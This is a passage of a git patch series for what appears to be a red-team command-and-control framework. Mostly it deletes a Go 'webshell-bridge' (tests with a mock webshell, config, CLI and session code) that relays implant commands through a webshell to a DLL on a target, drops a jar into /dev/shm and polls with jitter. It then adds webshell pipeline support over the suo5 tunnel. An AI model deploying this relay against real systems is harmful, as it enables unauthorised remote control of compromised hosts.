regData, _ := proto.Marshal(m.register) - sid := make([]byte, 4) - binary.LittleEndian.PutUint32(sid, m.sessionID) - w.Write(sid) - w.Write(regData) - case "spite": - // Echo: parse input Spites, modify Name, return - inSpites := &implantpb.Spites{} - if len(body) > 0 { - proto.Unmarshal(body, inSpites) - } - outSpites := &implantpb.Spites{} - for _, s := range inSpites.GetSpites() { - outSpites.Spites = append(outSpites.Spites, &implantpb.Spite{ - Name: "resp:" + s.Name, - TaskId: s.TaskId, - }) - } - data, _ := proto.Marshal(outSpites) - w.Write(data) - case "stream": - m.handleStream(w) - default: - w.WriteHeader(404) - } -} - -func (m *mockWebshell) setHandler(h func(string, []byte) ([]byte, int)) { - m.mu.Lock() - m.handler = h - m.mu.Unlock() -} - -// setStreamFrames configures length-prefixed frames returned by X-Stage: stream. -func (m *mockWebshell) setStreamFrames(frames [][]byte, delay time.Duration) { - m.streamMu.Lock() - m.streamFrames = frames - m.streamDelay = delay - m.streamMu.Unlock() -} - -// handleStream writes pre-configured length-prefixed frames to the response. 
-func (m *mockWebshell) handleStream(w http.ResponseWriter) { - m.streamMu.Lock() - frames := m.streamFrames - delay := m.streamDelay - m.streamMu.Unlock() - - if frames == nil { - w.WriteHeader(http.StatusNotFound) - return - } - - flusher, _ := w.(http.Flusher) - for _, frame := range frames { - lenBuf := make([]byte, 4) - binary.BigEndian.PutUint32(lenBuf, uint32(len(frame))) - w.Write(lenBuf) - w.Write(frame) - if flusher != nil { - flusher.Flush() - } - if delay > 0 { - time.Sleep(delay) - } - } -} - -func startMockWebshell(t *testing.T) (*httptest.Server, *mockWebshell) { - t.Helper() - mock := newMockWebshell() - srv := httptest.NewServer(mock) - t.Cleanup(srv.Close) - return srv, mock -} - -func TestChannelConnect(t *testing.T) { - srv, _ := startMockWebshell(t) - ch := NewChannel(srv.URL, "") - defer ch.Close() - - if err := ch.Connect(t.Context()); err != nil { - t.Fatalf("connect: %v", err) - } - // Verify structured status was parsed - if ch.lastStatus == nil { - t.Fatal("expected lastStatus to be populated") - } - if ch.lastStatus.Method != "jni" { - t.Errorf("expected method 'jni', got %q", ch.lastStatus.Method) - } - if ch.lastStatus.BridgeVersion != "1.0" { - t.Errorf("expected bridge_version '1.0', got %q", ch.lastStatus.BridgeVersion) - } -} - -func TestChannelConnectLegacy(t *testing.T) { - srv, mock := startMockWebshell(t) - // Simulate old webshell returning plain "LOADED" - mock.setHandler(func(stage string, body []byte) ([]byte, int) { - if stage == "status" { - return []byte("LOADED"), 200 - } - return nil, 404 - }) - ch := NewChannel(srv.URL, "") - defer ch.Close() - - if err := ch.Connect(t.Context()); err != nil { - t.Fatalf("legacy connect: %v", err) - } - // lastStatus should be nil for legacy responses - if ch.lastStatus != nil { - t.Error("expected nil lastStatus for legacy response") - } -} - -func TestChannelConnectNotLoaded(t *testing.T) { - srv, mock := startMockWebshell(t) - mock.setHandler(func(stage string, body []byte) 
([]byte, int) { - if stage == "status" { - return []byte(`{"ready":false,"method":"none","deps_present":false,"bridge_version":"1.0"}`), 200 - } - return nil, 404 - }) - - ch := NewChannel(srv.URL, "") - defer ch.Close() - - err := ch.Connect(t.Context()) - if err == nil { - t.Fatal("expected error for not-ready status") - } -} - -func TestChannelConnectNotLoadedLegacy(t *testing.T) { - srv, mock := startMockWebshell(t) - mock.setHandler(func(stage string, body []byte) ([]byte, int) { - if stage == "status" { - return []byte("NOT_LOADED"), 200 - } - return nil, 404 - }) - - ch := NewChannel(srv.URL, "") - defer ch.Close() - - err := ch.Connect(t.Context()) - if err == nil { - t.Fatal("expected error for NOT_LOADED") - } -} - -func TestChannelHandshake(t *testing.T) { - srv, _ := startMockWebshell(t) - ch := NewChannel(srv.URL, "") - defer ch.Close() - - reg, err := ch.Handshake() - if err != nil { - t.Fatalf("handshake: %v", err) - } - - if reg.Name != "test-dll" { - t.Errorf("expected name 'test-dll', got %q", reg.Name) - } - if len(reg.Module) != 3 { - t.Errorf("expected 3 modules, got %d", len(reg.Module)) - } - if reg.Sysinfo == nil || reg.Sysinfo.Os == nil || reg.Sysinfo.Os.Name != "Windows" { - t.Errorf("expected Windows sysinfo, got %+v", reg.Sysinfo) - } - if ch.SessionID() != 42 { - t.Errorf("expected sessionID 42, got %d", ch.SessionID()) - } -} - -func TestChannelForward(t *testing.T) { - srv, _ := startMockWebshell(t) - ch := NewChannel(srv.URL, "") - defer ch.Close() - - if _, err := ch.Handshake(); err != nil { - t.Fatalf("handshake: %v", err) - } - - resp, err := ch.Forward(1, &implantpb.Spite{Name: "exec"}) - if err != nil { - t.Fatalf("forward: %v", err) - } - if resp.Name != "resp:exec" { - t.Errorf("expected 'resp:exec', got %q", resp.Name) - } -} - -func TestChannelForwardMultiple(t *testing.T) { - srv, _ := startMockWebshell(t) - ch := NewChannel(srv.URL, "") - defer ch.Close() - - if _, err := ch.Handshake(); err != nil { - 
t.Fatalf("handshake: %v", err) - } - - for i, name := range []string{"exec", "upload", "download"} { - resp, err := ch.Forward(uint32(i+1), &implantpb.Spite{Name: name}) - if err != nil { - t.Fatalf("forward %d: %v", i, err) - } - expected := "resp:" + name - if resp.Name != expected { - t.Errorf("task %d: expected %q, got %q", i+1, expected, resp.Name) - } - } -} - -func TestChannelCloseIdempotent(t *testing.T) { - ch := NewChannel("http://localhost:1", "") - if err := ch.Close(); err != nil { - t.Fatalf("first close: %v", err) - } - if err := ch.Close(); err != nil { - t.Fatalf("second close: %v", err) - } -} - -func TestChannelForwardAfterClose(t *testing.T) { - ch := NewChannel("http://localhost:1", "") - ch.Close() - - _, err := ch.Forward(1, &implantpb.Spite{Name: "exec"}) - if err == nil { - t.Fatal("expected error forwarding on closed channel") - } -} - -func TestChannelStreamDispatch(t *testing.T) { - srv, mock := startMockWebshell(t) - - var callCount int - var mu sync.Mutex - mock.setHandler(func(stage string, body []byte) ([]byte, int) { - if stage == "status" { - return []byte(`{"ready":true,"method":"jni","deps_present":false,"bridge_version":"1.0"}`), 200 - } - if stage == "init" { - regData, _ := proto.Marshal(mock.register) - sid := make([]byte, 4) - binary.LittleEndian.PutUint32(sid, mock.sessionID) - return append(sid, regData...), 200 - } - if stage == "spite" { - mu.Lock() - callCount++ - n := callCount - mu.Unlock() - - // First call: return a streaming response - if n <= 3 { - resp := &implantpb.Spites{ - Spites: []*implantpb.Spite{{ - Name: "stream-chunk", - TaskId: 100, - }}, - } - data, _ := proto.Marshal(resp) - return data, 200 - } - // After that: empty - empty, _ := proto.Marshal(&implantpb.Spites{}) - return empty, 200 - } - return nil, 404 - }) - - ch := NewChannel(srv.URL, "") - defer ch.Close() - - respCh := ch.OpenStream(100) - ch.StartRecvLoop() - - // Wait for poll to deliver a response - select { - case spite := <-respCh: - if 
spite.Name != "stream-chunk" { - t.Errorf("expected 'stream-chunk', got %q", spite.Name) - } - case <-time.After(3 * time.Second): - t.Fatal("timeout waiting for streamed response") - } - - ch.CloseStream(100) -} - -func TestComputeHMAC(t *testing.T) { - secret := "test-secret-token-longer-than-32chars" - token := computeToken(secret) - - // Token should be a 64-char hex string (SHA-256) - if len(token) != 64 { - t.Fatalf("expected 64 hex chars, got %d", len(token)) - } - if _, err := hex.DecodeString(token); err != nil { - t.Fatalf("token is not valid hex: %v", err) - } - - // Same call within the same 30s window should produce the same token - token2 := computeToken(secret) - if token != token2 { - t.Error("same-window HMAC should be identical") - } - - // Different secret should produce different token - token3 := computeToken("different-secret-also-longer-than32") - if token == token3 { - t.Error("different secrets should produce different tokens") - } -} - -func TestHMACWindowTolerance(t *testing.T) { - secret := "test-secret-token-longer-than-32chars" - now := time.Now().Unix() / 30 - - // Verify that the token matches one of the valid windows (current ±1) - token := computeToken(secret) - - matched := false - for w := now - 1; w <= now+1; w++ { - mac := hmac.New(sha256.New, []byte(secret)) - _ = binary.Write(mac, binary.BigEndian, w) - expected := hex.EncodeToString(mac.Sum(nil)) - if expected == token { - matched = true - break - } - } - if !matched { - t.Error("HMAC token did not match any valid time window") - } -} - -func TestChannelDeliverDep(t *testing.T) { - var receivedName string - var receivedLen int - srv, mock := startMockWebshell(t) - mock.setHandler(func(stage string, body []byte) ([]byte, int) { - if stage == "deps" { - receivedLen = len(body) - return []byte("OK:/dev/shm/.jna.jar"), 200 - } - return nil, 404 - }) - // Also capture the X-Dep-Name header - origHandler := mock.handler - mock.setHandler(func(stage string, body []byte) ([]byte, 
int) { - return origHandler(stage, body) - }) - - ch := NewChannel(srv.URL, "test-token") - defer ch.Close() - - fakeJar := []byte("PK\x03\x04fake-jar-content") - err := ch.DeliverDep(t.Context(), ".jna.jar", fakeJar) - if err != nil { - t.Fatalf("deliver dep: %v", err) - } - if receivedLen != len(fakeJar) { - t.Errorf("expected %d bytes delivered, got %d", len(fakeJar), receivedLen) - } - _ = receivedName -} - -func TestChannelStatusDepsPresent(t *testing.T) { - srv, mock := startMockWebshell(t) - mock.setHandler(func(stage string, body []byte) ([]byte, int) { - if stage == "status" { - return []byte(`{"ready":true,"method":"jna","deps_present":true,"bridge_version":"1.0"}`), 200 - } - return nil, 404 - }) - ch := NewChannel(srv.URL, "") - defer ch.Close() - - if err := ch.Connect(t.Context()); err != nil { - t.Fatalf("connect: %v", err) - } - if ch.lastStatus == nil { - t.Fatal("expected lastStatus") - } - if !ch.lastStatus.DepsPresent { - t.Error("expected deps_present=true") - } - if ch.lastStatus.Method != "jna" { - t.Errorf("expected method 'jna', got %q", ch.lastStatus.Method) - } -} - -// TestHandshakeRejectsSpiteWrapped verifies that the Go bridge rejects the -// old (buggy) wire format where Register was wrapped inside a Spite message. -// This catches the regression where Rust encoded Spite(Register) instead of -// raw Register protobuf. -func TestHandshakeRejectsSpiteWrapped(t *testing.T) { - srv, mock := startMockWebshell(t) - - // Override init handler to return Spite-wrapped Register (the buggy format). - mock.setHandler(func(stage string, body []byte) ([]byte, int) { - if stage == "status" { - return []byte(`{"ready":true,"method":"jni","deps_present":false,"bridge_version":"1.0"}`), 200 - } - if stage == "init" { - reg := &implantpb.Register{ - Name: "test-dll", - Module: []string{"exec"}, - } - // Wrap in a Spite like the buggy Rust code did. 
- spite := &implantpb.Spite{ - TaskId: 0, - Name: "register", - Body: &implantpb.Spite_Register{Register: reg}, - } - spiteBytes, _ := proto.Marshal(spite) - sid := make([]byte, 4) - binary.LittleEndian.PutUint32(sid, 42) - return append(sid, spiteBytes...), 200 - } - return nil, 404 - }) - - ch := NewChannel(srv.URL, "") - defer ch.Close() - - reg, err := ch.Handshake() - if err == nil && reg.Name == "test-dll" { - t.Fatal("Spite-wrapped Register should NOT parse correctly as raw Register") - } - // Either err != nil or reg.Name != "test-dll" — both indicate the - // Spite-wrapped format is rejected, which is the correct behavior. -} - -// TestHandshakeMultiChunkResponse verifies that if the bridge returns multiple -// response spites (streaming), the Go side can parse them all. -func TestHandshakeMultiChunkResponse(t *testing.T) { - srv, mock := startMockWebshell(t) - - mock.setHandler(func(stage string, body []byte) ([]byte, int) { - if stage == "status" { - return []byte(`{"ready":true,"method":"jni","deps_present":false,"bridge_version":"1.0"}`), 200 - } - if stage == "init" { - regData, _ := proto.Marshal(mock.register) - sid := make([]byte, 4) - binary.LittleEndian.PutUint32(sid, mock.sessionID) - return append(sid, regData...), 200 - } - if stage == "spite" { - // Simulate a module that returns multiple chunks in one response. - outSpites := &implantpb.Spites{ - Spites: []*implantpb.Spite{ - {Name: "chunk-1", TaskId: 10}, - {Name: "chunk-2", TaskId: 10}, - {Name: "chunk-3", TaskId: 10}, - }, - } - data, _ := proto.Marshal(outSpites) - return data, 200 - } - return nil, 404 - }) - - ch := NewChannel(srv.URL, "") - defer ch.Close() - - if _, err := ch.Handshake(); err != nil { - t.Fatalf("handshake: %v", err) - } - - // Open stream, send request, verify all chunks arrive. 
- respCh := ch.OpenStream(10) - ch.StartRecvLoop() - - received := 0 - timeout := time.After(3 * time.Second) - for received < 3 { - select { - case <-respCh: - received++ - case <-timeout: - t.Fatalf("timeout: got %d/3 chunks", received) - } - } -} - -func TestJitterRange(t *testing.T) { - base := 1 * time.Second - minExpected := time.Duration(float64(base) * (1 - jitterFactor)) - maxExpected := time.Duration(float64(base) * (1 + jitterFactor)) - - for i := 0; i < 100; i++ { - j := jitter(base) - if j < minExpected || j > maxExpected { - t.Fatalf("jitter out of range: got %v, expected [%v, %v]", j, minExpected, maxExpected) - } - } -} - -func TestStreamDispatchViaStreamMode(t *testing.T) { - srv, mock := startMockWebshell(t) - - // Build stream frames: 2 spites for task 200, then connection closes. - var frames [][]byte - for i := 0; i < 2; i++ { - spites := &implantpb.Spites{ - Spites: []*implantpb.Spite{{ - Name: fmt.Sprintf("stream-data-%d", i), - TaskId: 200, - }}, - } - data, _ := proto.Marshal(spites) - frames = append(frames, data) - } - mock.setStreamFrames(frames, 10*time.Millisecond) - - ch := NewChannel(srv.URL, "") - defer ch.Close() - - if err := ch.Connect(t.Context()); err != nil { - t.Fatalf("connect: %v", err) - } - - respCh := ch.OpenStream(200) - ch.StartRecvLoop() - - for i := 0; i < 2; i++ { - select { - case spite := <-respCh: - expected := fmt.Sprintf("stream-data-%d", i) - if spite.Name != expected { - t.Errorf("frame %d: expected %q, got %q", i, expected, spite.Name) - } - case <-time.After(3 * time.Second): - t.Fatalf("timeout waiting for stream frame %d", i) - } - } - ch.CloseStream(200) -} - -func TestStreamFallbackToPoll(t *testing.T) { - srv, mock := startMockWebshell(t) - - // Stream returns 404 (not supported) — should fall back to poll mode. - // Leave streamFrames nil so handleStream returns 404. 
- - var callCount int - var mu sync.Mutex - mock.setHandler(func(stage string, body []byte) ([]byte, int) { - switch stage { - case "status": - return []byte(`{"ready":true,"method":"jni","deps_present":false,"bridge_version":"1.0"}`), 200 - case "init": - regData, _ := proto.Marshal(mock.register) - sid := make([]byte, 4) - binary.LittleEndian.PutUint32(sid, mock.sessionID) - return append(sid, regData...), 200 - case "stream": - return nil, 404 - case "spite": - mu.Lock() - callCount++ - n := callCount - mu.Unlock() - if n <= 2 { - resp := &implantpb.Spites{ - Spites: []*implantpb.Spite{{ - Name: "poll-data", - TaskId: 300, - }}, - } - data, _ := proto.Marshal(resp) - return data, 200 - } - empty, _ := proto.Marshal(&implantpb.Spites{}) - return empty, 200 - } - return nil, 404 - }) - - ch := NewChannel(srv.URL, "") - defer ch.Close() - - if err := ch.Connect(t.Context()); err != nil { - t.Fatalf("connect: %v", err) - } - - respCh := ch.OpenStream(300) - ch.StartRecvLoop() - - select { - case spite := <-respCh: - if spite.Name != "poll-data" { - t.Errorf("expected 'poll-data', got %q", spite.Name) - } - case <-time.After(5 * time.Second): - t.Fatal("timeout waiting for poll fallback data") - } - ch.CloseStream(300) -} - -func TestStreamHeartbeatFrame(t *testing.T) { - srv, mock := startMockWebshell(t) - - // Send: heartbeat (0-len frame), real data, heartbeat. 
- spites := &implantpb.Spites{ - Spites: []*implantpb.Spite{{Name: "after-heartbeat", TaskId: 400}}, - } - data, _ := proto.Marshal(spites) - mock.setStreamFrames([][]byte{ - {}, // zero-length heartbeat - data, // real frame - {}, // another heartbeat - }, 10*time.Millisecond) - - ch := NewChannel(srv.URL, "") - defer ch.Close() - - if err := ch.Connect(t.Context()); err != nil { - t.Fatalf("connect: %v", err) - } - - respCh := ch.OpenStream(400) - ch.StartRecvLoop() - - select { - case spite := <-respCh: - if spite.Name != "after-heartbeat" { - t.Errorf("expected 'after-heartbeat', got %q", spite.Name) - } - case <-time.After(3 * time.Second): - t.Fatal("timeout waiting for data after heartbeat") - } - ch.CloseStream(400) -} - -func TestReadFrameOversized(t *testing.T) { - // Frame length exceeding streamFrameMaxSize should error. - lenBuf := make([]byte, 4) - binary.BigEndian.PutUint32(lenBuf, streamFrameMaxSize+1) - r := bytes.NewReader(lenBuf) - _, err := readFrame(r) - if err == nil { - t.Fatal("expected error for oversized frame") - } -} diff --git a/server/cmd/webshell-bridge/config.go b/server/cmd/webshell-bridge/config.go deleted file mode 100644 index 75e251c9..00000000 --- a/server/cmd/webshell-bridge/config.go +++ /dev/null @@ -1,20 +0,0 @@ -package main - -// Config holds the bridge configuration. 
-type Config struct { - AuthFile string // path to listener.auth mTLS certificate - ServerAddr string // optional server address override - ListenerName string // listener name for registration - ListenerIP string // listener external IP - PipelineName string // pipeline name - WebshellURL string // webshell URL (http:// or https://) - StageToken string // auth token for X-Stage requests (must match webshell's STAGE_TOKEN) - DLLPath string // optional path to bridge DLL for auto-loading - DepsDir string // optional dir containing dependency jars (e.g., jna.jar) for auto-delivery - Debug bool // enable debug logging -} - -// WebshellHTTPURL returns the webshell URL for HTTP requests. -func (c *Config) WebshellHTTPURL() string { - return c.WebshellURL -} diff --git a/server/cmd/webshell-bridge/main.go b/server/cmd/webshell-bridge/main.go deleted file mode 100644 index a3ed4bd7..00000000 --- a/server/cmd/webshell-bridge/main.go +++ /dev/null @@ -1,63 +0,0 @@ -package main - -import ( - "context" - "flag" - "fmt" - "os" - "os/signal" - "syscall" - - "github.com/chainreactors/logs" -) - -func main() { - cfg := &Config{} - flag.StringVar(&cfg.AuthFile, "auth", "", "path to listener.auth mTLS certificate file") - flag.StringVar(&cfg.ServerAddr, "server", "", "server address (overrides auth file)") - flag.StringVar(&cfg.ListenerName, "listener", "webshell-listener", "listener name") - flag.StringVar(&cfg.ListenerIP, "ip", "127.0.0.1", "listener external IP") - flag.StringVar(&cfg.PipelineName, "pipeline", "", "pipeline name (auto-generated if empty)") - flag.StringVar(&cfg.WebshellURL, "url", "", "webshell URL (e.g. 
http://target/shell.jsp)") - flag.StringVar(&cfg.StageToken, "token", "", "auth token matching webshell's STAGE_TOKEN") - flag.StringVar(&cfg.DLLPath, "dll", "", "path to bridge DLL for auto-loading (optional)") - flag.StringVar(&cfg.DepsDir, "deps", "", "dir containing dependency jars (e.g., jna.jar) for auto-delivery") - flag.BoolVar(&cfg.Debug, "debug", false, "enable debug logging") - flag.Parse() - - if cfg.AuthFile == "" || cfg.WebshellURL == "" { - fmt.Fprintf(os.Stderr, "Usage: webshell-bridge --auth --url --token \n") - flag.PrintDefaults() - os.Exit(1) - } - - if cfg.PipelineName == "" { - cfg.PipelineName = fmt.Sprintf("webshell_%s", cfg.ListenerName) - } - - if cfg.Debug { - logs.Log.SetLevel(logs.DebugLevel) - } - - ctx, cancel := context.WithCancel(context.Background()) - defer cancel() - - sigCh := make(chan os.Signal, 1) - signal.Notify(sigCh, syscall.SIGINT, syscall.SIGTERM) - go func() { - <-sigCh - logs.Log.Important("shutting down...") - cancel() - }() - - bridge, err := NewBridge(cfg) - if err != nil { - logs.Log.Errorf("failed to create bridge: %v", err) - os.Exit(1) - } - - if err := bridge.Start(ctx); err != nil { - logs.Log.Errorf("bridge exited with error: %v", err) - os.Exit(1) - } -} diff --git a/server/cmd/webshell-bridge/main_test.go b/server/cmd/webshell-bridge/main_test.go deleted file mode 100644 index 83667a42..00000000 --- a/server/cmd/webshell-bridge/main_test.go +++ /dev/null @@ -1,15 +0,0 @@ -package main - -import ( - "io" - "os" - "testing" - - "github.com/chainreactors/logs" -) - -func TestMain(m *testing.M) { - logs.Log = logs.NewLogger(logs.WarnLevel) - logs.Log.SetOutput(io.Discard) - os.Exit(m.Run()) -} diff --git a/server/cmd/webshell-bridge/pipelinectl/main.go b/server/cmd/webshell-bridge/pipelinectl/main.go deleted file mode 100644 index f40cca95..00000000 --- a/server/cmd/webshell-bridge/pipelinectl/main.go +++ /dev/null @@ -1,98 +0,0 @@ -package main - -import ( - "context" - "flag" - "fmt" - "log" - - 
"github.com/chainreactors/IoM-go/client" - "github.com/chainreactors/IoM-go/mtls" - "github.com/chainreactors/IoM-go/proto/client/clientpb" -) - -func main() { - authFile := flag.String("auth", "", "path to admin.auth file") - action := flag.String("action", "start", "action: list, register, start, stop") - listenerID := flag.String("listener", "webshell-listener", "listener ID") - pipelineName := flag.String("pipeline", "webshell_webshell-listener", "pipeline name") - pipelineType := flag.String("type", "webshell", "pipeline type") - flag.Parse() - - if *authFile == "" { - log.Fatal("--auth is required") - } - - config, err := mtls.ReadConfig(*authFile) - if err != nil { - log.Fatalf("read config: %v", err) - } - - conn, err := mtls.Connect(config) - if err != nil { - log.Fatalf("connect: %v", err) - } - defer conn.Close() - - server, err := client.NewServerStatus(conn, config) - if err != nil { - log.Fatalf("init server: %v", err) - } - - switch *action { - case "list": - listeners, err := server.Rpc.GetListeners(context.Background(), &clientpb.Empty{}) - if err != nil { - log.Fatalf("get listeners: %v", err) - } - for _, l := range listeners.Listeners { - fmt.Printf("Listener: %s IP: %s Active: %v\n", l.Id, l.Ip, l.Active) - if l.Pipelines != nil { - for _, p := range l.Pipelines.Pipelines { - fmt.Printf(" Pipeline: %s Enable: %v\n", p.Name, p.Enable) - } - } - } - - case "register": - fmt.Printf("Registering pipeline %s (type=%s) on listener %s\n", *pipelineName, *pipelineType, *listenerID) - _, err := server.Rpc.RegisterPipeline(context.Background(), &clientpb.Pipeline{ - Name: *pipelineName, - ListenerId: *listenerID, - Type: *pipelineType, - Enable: true, - Body: &clientpb.Pipeline_Tcp{ - Tcp: &clientpb.TCPPipeline{ - Host: "127.0.0.1", - Port: 0, - }, - }, - }) - if err != nil { - log.Fatalf("register pipeline: %v", err) - } - fmt.Println("Pipeline registered!") - - case "start": - fmt.Printf("Starting pipeline %s on listener %s\n", *pipelineName, 
*listenerID) - _, err := server.Rpc.StartPipeline(context.Background(), &clientpb.CtrlPipeline{ - Name: *pipelineName, - ListenerId: *listenerID, - }) - if err != nil { - log.Fatalf("start pipeline: %v", err) - } - fmt.Println("Pipeline started!") - - case "stop": - fmt.Printf("Stopping pipeline %s on listener %s\n", *pipelineName, *listenerID) - _, err := server.Rpc.StopPipeline(context.Background(), &clientpb.CtrlPipeline{ - Name: *pipelineName, - ListenerId: *listenerID, - }) - if err != nil { - log.Fatalf("stop pipeline: %v", err) - } - fmt.Println("Pipeline stopped!") - } -} diff --git a/server/cmd/webshell-bridge/session.go b/server/cmd/webshell-bridge/session.go deleted file mode 100644 index aa4f183f..00000000 --- a/server/cmd/webshell-bridge/session.go +++ /dev/null @@ -1,116 +0,0 @@ -package main - -import ( - "context" - "fmt" - "time" - - "github.com/chainreactors/IoM-go/proto/client/clientpb" - "github.com/chainreactors/IoM-go/proto/implant/implantpb" - "github.com/chainreactors/IoM-go/proto/services/listenerrpc" - "github.com/chainreactors/logs" -) - -// Session represents a single implant session managed by the bridge. -// Each session owns a Channel that communicates with the malefic bind DLL -// on the target through the malefic protocol over HTTP. -type Session struct { - ID string - PipelineID string - ListenerID string - - channel ChannelIface -} - -// NewSession reads the malefic handshake from the DLL (SysInfo + Modules) -// and registers the session with the server. 
-func NewSession( - rpc listenerrpc.ListenerRPCClient, - ctx context.Context, - id, pipelineID, listenerID string, - channel ChannelIface, -) (*Session, error) { - // Read registration data from DLL via malefic handshake - reg, err := channel.Handshake() - if err != nil { - return nil, fmt.Errorf("handshake: %w", err) - } - - sess := &Session{ - ID: id, - PipelineID: pipelineID, - ListenerID: listenerID, - channel: channel, - } - - // Use real data from the DLL - if reg.Name == "" { - reg.Name = fmt.Sprintf("webshell-%s", id[:8]) - } - - _, err = rpc.Register(ctx, &clientpb.RegisterSession{ - SessionId: id, - PipelineId: pipelineID, - ListenerId: listenerID, - RawId: channel.SessionID(), - RegisterData: reg, - Target: fmt.Sprintf("webshell://%s", id), - }) - if err != nil { - return nil, fmt.Errorf("register session: %w", err) - } - - logs.Log.Importantf("session registered: %s (name=%s, modules=%d, sid=%d)", id, reg.Name, len(reg.Module), channel.SessionID()) - return sess, nil -} - -// HandleUnary forwards a Spite request through the malefic channel to the -// bind DLL and returns a single response. Use for non-streaming tasks. -func (s *Session) HandleUnary(taskID uint32, req *implantpb.Spite) (*implantpb.Spite, error) { - return s.channel.Forward(taskID, req) -} - -// OpenTaskStream registers a persistent response channel for a streaming task. -// Returns a channel that receives all DLL responses for this taskID. -func (s *Session) OpenTaskStream(taskID uint32) <-chan *implantpb.Spite { - return s.channel.OpenStream(taskID) -} - -// SendTaskSpite sends a spite to the DLL for a task (streaming or initial request). -func (s *Session) SendTaskSpite(taskID uint32, spite *implantpb.Spite) error { - return s.channel.SendSpite(taskID, spite) -} - -// CloseTaskStream cleans up a streaming task's response channel. -func (s *Session) CloseTaskStream(taskID uint32) { - s.channel.CloseStream(taskID) -} - -// Checkin sends a heartbeat for this session. 
-func (s *Session) Checkin(rpc listenerrpc.ListenerRPCClient, ctx context.Context) { - _, err := rpc.Checkin(ctx, &implantpb.Ping{ - Nonce: int32(time.Now().Unix() & 0x7FFFFFFF), - }) - if err != nil { - logs.Log.Debugf("checkin failed for %s: %v", s.ID, err) - } -} - -// Close shuts down the session's malefic channel. -// The server will mark the session dead when checkins stop. -func (s *Session) Close() error { - logs.Log.Importantf("session %s closing (server will mark dead after checkin timeout)", s.ID) - if s.channel != nil { - s.channel.CloseAllStreams() - return s.channel.Close() - } - return nil -} - -// Alive returns true if the underlying malefic channel is still connected. -func (s *Session) Alive() bool { - if s.channel == nil { - return false - } - return !s.channel.IsClosed() -} From 86b5d5816d7aef1b8d29d87f949b7bdfd3854efd Mon Sep 17 00:00:00 2001 From: wuchulonly <1746825356@qq.com> Date: Mon, 23 Mar 2026 04:15:45 +0800 Subject: [PATCH 14/19] chore(deps): update IoM-go submodule and move suo5 to indirect --- external/IoM-go | 2 +- go.mod | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/external/IoM-go b/external/IoM-go index 878f45b4..1181f64a 160000 --- a/external/IoM-go +++ b/external/IoM-go @@ -1 +1 @@ -Subproject commit 878f45b4d1cb34ea132a9eafea3ae79caf3b07f0 +Subproject commit 1181f64a77d24693fc6820ddefc908a35babedfd diff --git a/go.mod b/go.mod index 74060951..91ce5cc0 100644 --- a/go.mod +++ b/go.mod @@ -47,7 +47,6 @@ require ( github.com/traefik/yaegi v0.14.3 github.com/wabzsy/gonut v1.0.0 github.com/yuin/gopher-lua v1.1.1 - github.com/zema1/suo5 v1.3.2-0.20250219115440-31983ee59a83 gopkg.in/yaml.v3 v3.0.1 gorm.io/driver/postgres v1.6.0 gorm.io/gorm v1.25.10 @@ -213,6 +212,7 @@ require ( github.com/yuin/goldmark v1.7.4 // indirect github.com/yuin/goldmark-emoji v1.0.3 // indirect github.com/zema1/rawhttp v0.2.0 // indirect + github.com/zema1/suo5 v1.3.2-0.20250219115440-31983ee59a83 // indirect golang.org/x/mod v0.32.0 
// indirect golang.org/x/tools v0.41.0 // indirect golang.org/x/xerrors v0.0.0-20231012003039-104605ab7028 // indirect From f12afe5bd62bc275f5a656a42f69146da544cccc Mon Sep 17 00:00:00 2001 From: wuchulonly <1746825356@qq.com> Date: Mon, 23 Mar 2026 04:15:54 +0800 Subject: [PATCH 15/19] feat(pipeline): preserve raw custom params through DB roundtrips Add RawCustomParams field to PipelineParams so that non-built-in pipeline types (e.g. webshell) retain their original JSON params when serialized to/from the database. --- helper/implanttypes/pipeline.go | 3 +++ server/internal/db/models/pipeline.go | 9 ++++++++- 2 files changed, 11 insertions(+), 1 deletion(-) diff --git a/helper/implanttypes/pipeline.go b/helper/implanttypes/pipeline.go index 67ddd643..873459ce 100644 --- a/helper/implanttypes/pipeline.go +++ b/helper/implanttypes/pipeline.go @@ -235,6 +235,9 @@ type PipelineParams struct { ErrorPage string `json:"error_page,omitempty" gorm:"-"` BodyPrefix string `json:"body_prefix,omitempty"` BodySuffix string `json:"body_suffix,omitempty"` + // RawCustomParams preserves the original Custom.Params JSON string for + // non-built-in pipeline types (e.g. webshell), surviving DB roundtrips. 
+ RawCustomParams string `json:"raw_custom_params,omitempty"` } func (params *PipelineParams) String() string { diff --git a/server/internal/db/models/pipeline.go b/server/internal/db/models/pipeline.go index b405e1bb..f95f45bd 100644 --- a/server/internal/db/models/pipeline.go +++ b/server/internal/db/models/pipeline.go @@ -55,12 +55,15 @@ func customPipelineParams(params string, pipeline *clientpb.Pipeline) *implantty merged := pipelineParamsFromProto(pipeline) customParams, err := implanttypes.UnmarshalPipelineParams(params) if err != nil || customParams == nil { + merged.RawCustomParams = params return merged } customParams.Parser = merged.Parser customParams.Tls = merged.Tls customParams.Encryption = merged.Encryption customParams.Secure = merged.Secure + // Preserve original custom params JSON for non-built-in pipelines (e.g. webshell) + customParams.RawCustomParams = params return customParams } @@ -191,8 +194,12 @@ func (pipeline *Pipeline) ToProtobuf() *clientpb.Pipeline { } default: // All non-built-in types (custom/externally-managed pipelines). + // Prefer the preserved raw custom params over re-marshaling PipelineParams, + // because PipelineParams may not have fields for custom keys (e.g. suo5_url). params := "" - if pipeline.PipelineParams != nil { + if pipeline.PipelineParams != nil && pipeline.PipelineParams.RawCustomParams != "" { + params = pipeline.PipelineParams.RawCustomParams + } else if pipeline.PipelineParams != nil { data, _ := json.Marshal(pipeline.PipelineParams) params = string(data) } From a8a4ae48812f6e7527d59f23b0cf197fdfebb2cc Mon Sep 17 00:00:00 2001 From: wuchulonly <1746825356@qq.com> Date: Mon, 23 Mar 2026 04:16:02 +0800 Subject: [PATCH 16/19] feat(listener): add WebShellPipeline with suo5 transport Implement WebShellPipeline inside the listener process, replacing the standalone bridge binary. Uses suo5 for full-duplex streaming, supports DLL bootstrap via HTTP staging, TLV framing, and dependency delivery. 
